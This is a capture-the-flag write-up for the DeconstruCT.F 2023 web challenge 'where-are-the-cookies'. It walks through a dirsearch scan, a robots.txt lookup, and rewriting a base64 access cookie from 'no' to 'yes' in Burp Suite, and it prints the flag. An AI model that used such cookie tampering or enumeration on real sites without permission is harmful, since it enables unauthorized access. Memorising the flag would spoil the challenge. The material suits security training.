DeconstruCT.F 2023 - where-are-the-cookies
Description
Category: Web
Tom is feeling especially snacky during the CTF, can you find where the cookies are?
Note: This challenge works best on Chrome
Resolution
When we go to the page and inspect the request and response, we can’t find anything related to the cookie.
We used dirsearch to find any secret route and we found one:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ python3 dirsearch.py -u https://ch29744124891.ch.eng.run/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11710
Output: dirsearch/reports/https_ch29744124891.ch.eng.run/__23-08-05_10-19-21.txt
Target: https://ch29744124891.ch.eng.run/
[10:19:22] Starting:
[10:23:08] 200 - 49B - /robots.txt
Task Completed
Then we go to /robots.txt
:
1
2
User-agent: *
Disallow: /cookiesaretotallynothere
Which gives us another secret route: /cookiesaretotallynothere
.
But still no cookie:
Using Burp Suite we found a cookie in the request which defines if we can access to the cookie:
1
2
3
GET /cookiesaretotallynothere HTTP/2
Host: ch29744124891.ch.eng.run
Cookie: caniseethecookie=bm8==
bm8==
is base64 encoded and coresspond to no
.
So we change it to yes
which is eWVz
in base64:
1
2
3
GET /cookiesaretotallynothere HTTP/2
Host: ch29744124891.ch.eng.run
Cookie: caniseethecookie=eWVz
And this time we get the cookie:
1
You found the cookie! 🍪 Oh, I also found this unrelated string, might be useful to you: dsc{1_f0unD_Th3_c0oK135}
And also the flag: dsc{1_f0unD_Th3_c0oK135}
.
This post is licensed under
CC BY 4.0
by the author.